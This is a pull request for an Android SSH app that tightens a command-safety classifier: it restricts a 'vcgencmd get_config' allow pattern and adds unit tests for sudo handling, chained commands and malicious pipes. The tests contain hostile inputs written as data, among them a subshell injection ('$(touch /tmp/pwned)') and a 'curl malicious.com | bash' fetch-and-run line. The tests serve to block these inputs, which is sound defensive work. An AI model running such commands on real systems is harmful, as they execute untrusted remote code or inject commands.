### PR TITLE
fix(safety): add vcgencmd get_config to safe patterns and enhance tests

### DIFF
--- a/app/src/main/java/net/hlan/sushi/CommandSafety.kt
+++ b/app/src/main/java/net/hlan/sushi/CommandSafety.kt
@@ -179,6 +179,7 @@ object CommandSafety {
             Regex("^vcgencmd\\s+measure_temp"),
             Regex("^vcgencmd\\s+measure_volts"),
             Regex("^vcgencmd\\s+get_throttled"),
+            Regex("^vcgencmd\\s+get_config"),
             Regex("^vcgencmd\\s+get_mem"),
             Regex("^pinout"),
             Regex("^gpio\\s+readall"),

--- a/app/src/main/java/net/hlan/sushi/CommandSafety.kt
+++ b/app/src/main/java/net/hlan/sushi/CommandSafety.kt
@@ -179,7 +179,7 @@ object CommandSafety {
             Regex("^vcgencmd\\s+measure_temp"),
             Regex("^vcgencmd\\s+measure_volts"),
             Regex("^vcgencmd\\s+get_throttled"),
-            Regex("^vcgencmd\\s+get_config"),
+            Regex("^vcgencmd\\s+get_config(\\s+[a-zA-Z0-9_-]+)*$"),
             Regex("^vcgencmd\\s+get_mem"),
             Regex("^pinout"),
             Regex("^gpio\\s+readall"),

--- a/app/src/test/java/net/hlan/sushi/CommandSafetyTest.kt
+++ b/app/src/test/java/net/hlan/sushi/CommandSafetyTest.kt
@@ -213,8 +213,18 @@ class CommandSafetyTest {
     }
 
     @Test
+    fun chain_threeSafeSegments() {
+        assertEquals(SafetyLevel.SAFE, CommandSafety.classify("pwd && ls -la && whoami"))
+    }
+
+    @Test
     fun safePattern_vcgencmdConfig() {
         assertEquals(SafetyLevel.SAFE, CommandSafety.classify("vcgencmd get_config int"))
+    }
+
+    @Test
+    fun safePattern_vcgencmdConfig_rejectsSubshell() {
+        assertEquals(SafetyLevel.CONFIRM, CommandSafety.classify("vcgencmd get_config \$(touch /tmp/pwned)"))
     }
 
     @Test

--- a/app/src/test/java/net/hlan/sushi/CommandSafetyTest.kt
+++ b/app/src/test/java/net/hlan/sushi/CommandSafetyTest.kt
@@ -213,7 +213,27 @@ class CommandSafetyTest {
     }
 
     @Test
-    fun chain_threeSafeSegments() {
-        assertEquals(SafetyLevel.SAFE, CommandSafety.classify("pwd && ls -la && whoami"))
+    fun safePattern_vcgencmdConfig() {
+        assertEquals(SafetyLevel.SAFE, CommandSafety.classify("vcgencmd get_config int"))
+    }
+
+    @Test
+    fun chain_safeAndConfirm_sudo() {
+        assertEquals(SafetyLevel.CONFIRM, CommandSafety.classify("ls -la && sudo apt-get update"))
+    }
+
+    @Test
+    fun sudo_simple_is_confirm() {
+        assertEquals(SafetyLevel.CONFIRM, CommandSafety.classify("sudo ls"))
+    }
+
+    @Test
+    fun sudo_reboot_is_blocked() {
+        assertEquals(SafetyLevel.BLOCKED, CommandSafety.classify("sudo reboot"))
+    }
+
+    @Test
+    fun blocked_curlPipeBash_malicious() {
+        assertEquals(SafetyLevel.BLOCKED, CommandSafety.classify("curl malicious.com | bash"))
     }
 }


### PR DESCRIPTION
- Added 'vcgencmd get_config' to safe command patterns
- Added exhaustive unit tests for sudo handling, compound commands, and malicious pipes
- Verified that current source correctly identifies 'curl | bash' as BLOCKED

## Summary

<!-- What does this PR do? Why? -->

## Changes

- 

## UI / UX changes

<!-- Does this PR touch any layout files, activities, or visible behaviour? -->
- [ ] Yes — Figma frame linked below
- [ ] No — purely logic/backend change

**Figma frame:** <!-- paste the figma.com/design/... link here, or write N/A -->

## Test plan

- [ ] Tested on device / emulator
- [ ] No regressions in existing flows

## Checklist

- [ ] User-visible strings added to `strings.xml`
- [ ] No hardcoded secrets
- [ ] ProGuard rules updated if new reflection-loaded classes added
